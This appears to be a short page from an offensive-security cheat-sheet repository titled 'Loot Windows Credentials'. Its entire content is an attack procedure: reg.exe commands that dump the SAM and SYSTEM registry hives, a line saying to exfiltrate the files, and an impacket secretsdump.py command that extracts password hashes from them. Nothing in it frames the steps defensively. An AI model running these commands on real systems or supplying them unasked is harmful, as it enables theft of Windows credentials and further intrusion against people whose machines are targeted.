killchain-compendium/exfiltration/windows/loot.md

# Loot Windows Credentials

```sh
reg.exe save HKLM\SAM sam.bak
```
```sh
reg.exe save HKLM\SYSTEM system.bak
```

* Exifiltrate and use impacket
```sh
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```